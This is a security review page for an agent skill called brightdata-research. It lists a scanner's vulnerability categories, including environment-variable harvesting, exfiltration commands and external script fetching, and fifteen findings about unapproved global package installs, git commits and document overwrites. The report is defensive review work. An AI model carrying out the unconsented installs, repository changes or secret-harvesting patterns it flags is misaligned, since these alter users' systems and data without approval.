ClawHub

brightdata-research

Security checks across malware telemetry and agentic risk

Overview

The skill mostly matches its advertised research-to-Feishu workflow, but it also allows automatic global installs, adding external skills, and git repository changes without enough user control.

Install only if you are comfortable with an agent using BrightData, reading/writing Feishu or Lark documents as your user, and modifying the local environment. Before use, require manual approval for npm global installs, adding Lark skills, any git init or commit, and any document replace operation; prefer Markdown-only output or serial execution when you do not want those side effects.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Findings (15)

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The checklist explicitly authorizes automatic installation of a global CLI (`npm install -g @brightdata/cli`) and steers the operator into authentication setup, which expands the skill from research orchestration into host modification and credential onboarding. That is dangerous because it can change the local environment and create trust boundaries not clearly justified by the skill’s core task, especially if run without explicit per-action user consent.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The Lark section permits automatic installation of `lark-cli` and related skills, broadening the skill’s operational scope to persistent system changes and third-party tooling setup. In a skill that should organize research outputs, silently expanding into CLI deployment and configuration increases supply-chain and environment-tampering risk.

Context-Inappropriate Capability

Medium
Confidence
97% confidence
Finding
Automatically running `git init` and creating a commit is outside the declared batch-research workflow and modifies project state in a durable way. This is risky because it can alter repository history, interfere with existing workflows, and create misleading provenance or accidental inclusion of sensitive files in commits.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The fallback guidance tells the agent to automatically install global CLIs (`@brightdata/cli`, `@larksuite/cli`) as part of error handling, which expands the skill from research/document work into system modification. In an agent setting, unattended package installation can change the host environment, pull untrusted code from registries, and create persistence or supply-chain risk without explicit user consent.

Context-Inappropriate Capability

Medium
Confidence
92% confidence
Finding
The document permits automatic git initialization, initial commit, and worktree-related repository setup when subagent/worktree fails. That is outside the stated batch-research-and-docs scope and can silently alter a user's filesystem and repository history, which is risky in environments where the agent should not mutate project state unless clearly authorized.

Vague Triggers

Medium
Confidence
84% confidence
Finding
The trigger language is very broad and encourages automatic activation for loosely related requests, which can cause the skill to run web scraping, deduplication, and Feishu write actions when the user did not clearly intend that full workflow. In an agent setting, ambiguous activation boundaries increase the risk of over-collection, unintended third-party access, and writes to external documents without sufficiently explicit confirmation.

Missing User Warnings

Medium
Confidence
89% confidence
Finding
The README promotes a pipeline that performs web scraping/search and writes results into Feishu, but it does not clearly warn about data handling, third-party disclosure, or the possibility of copying sensitive user-provided information into external services. In practice, this omission can lead users or downstream agents to process personal, confidential, or regulated data without informed consent or policy checks.

Vague Triggers

Medium
Confidence
90% confidence
Finding
The trigger description is broad enough to activate on ordinary research or document-maintenance requests, including cases where the user does not explicitly name the skill. That can cause overbroad invocation of a capability that performs batch web research, deduplication, and Feishu/Lark document writes, increasing the chance of unintended external access or modification of user documents.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The checklist allows automatic global package installation without an explicit warning that the action will modify the host system. Even if intended as convenience, executing package-manager commands can introduce unreviewed software, change PATH-resolved binaries, and violate least surprise for the user.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The checklist references API token configuration and login flows but provides no privacy warning about credential sensitivity, storage location, or handling expectations. This is dangerous because it normalizes credential setup in an automated workflow without clarifying that secrets must not be exposed, logged, or requested unnecessarily.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
Allowing automatic `git init` and `git add -A && git commit` without warning is unsafe because it creates persistent repository/history changes and may capture unrelated or sensitive files. In the context of a research skill, this behavior is unnecessary by default and materially increases the chance of unintended data exposure or workspace corruption.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
The guidance to automatically run `npm install -g @brightdata/cli` lacks an explicit warning that it will modify the system by installing global software. In an automated agent workflow, this can surprise users, violate least-privilege expectations, and expose the machine to package-registry or dependency compromise.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
The fallback instructs automatic installation of `@larksuite/cli` and a skill package via `npx skills add` without warning the user about system changes or the trust implications of pulling packages from external sources. This creates both environment-modification risk and a software supply-chain exposure path unrelated to the core task unless the user has explicitly approved setup actions.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
Allowing automatic git initialization and an initial commit without a clear warning permits silent repository mutation. Even if intended as a convenience fallback, creating a repo and commit can interfere with user workflows, alter audit/history expectations, and cause accidental disclosure or staging of files.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The document explicitly documents a `replace` mode that can overwrite the full contents of a Feishu/Lark document, but it does not include any warning, confirmation requirement, backup guidance, or safe-use constraints. In the context of a batch research skill that appends and updates shared documents, this increases the risk of accidental destructive modification of user data if the command is copied or operationalized without caution.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal